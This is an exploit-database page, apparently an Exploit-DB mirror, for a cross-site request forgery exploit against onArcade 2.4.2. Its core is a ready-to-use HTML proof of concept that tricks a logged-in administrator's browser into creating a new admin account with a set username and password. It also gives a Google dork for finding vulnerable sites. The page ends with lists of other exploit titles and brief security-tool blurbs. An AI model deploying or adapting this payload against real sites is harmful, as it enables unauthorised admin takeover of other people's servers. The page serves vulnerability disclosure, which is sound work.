Menu

Search for hundreds of thousands of exploits

"onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)"

Author

Exploit author

r3m0t3nu11

Platform

Exploit platform

php

Release date

Exploit published date

2018-08-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# Exploit Title: Cross-Site Request Forgery (Add Admin)
 # Google Dork: Powered by onArcade v2.4.2
 # Date: 2018/August/4
 # Author: r3m0t3nu11[Zero-way]
 # Software Link: ["http://www.onarcade.com"]
 # Version: ["Uptodate"]

the appilication is vulnerable to CSRF attack (No CSRF token in place) meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).



[P0C]#

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://server/path/admin/members.php?a=add_member&ajax=1"method="POST">
      <input type="hidden" name="username" value="r3m0t3nu11" />
      <input type="hidden" name="email" value="l0v3rs14&#64;gmail&#46;com"/>
      <input type="hidden" name="password" value="123123" />
      <input type="hidden" name="user&#95;group" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-04-06 "Bolt CMS 3.7.0 - Authenticated Remote Code Execution" webapps php r3m0t3nu11
2019-10-15 "Bolt CMS 3.6.10 - Cross-Site Request Forgery" webapps php r3m0t3nu11
2018-08-06 "onArcade 2.4.2 - Cross-Site Request Forgery (Add Admin)" webapps php r3m0t3nu11
2018-07-24 "D-link DAP-1360 - Path Traversal / Cross-Site Scripting" webapps hardware r3m0t3nu11
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.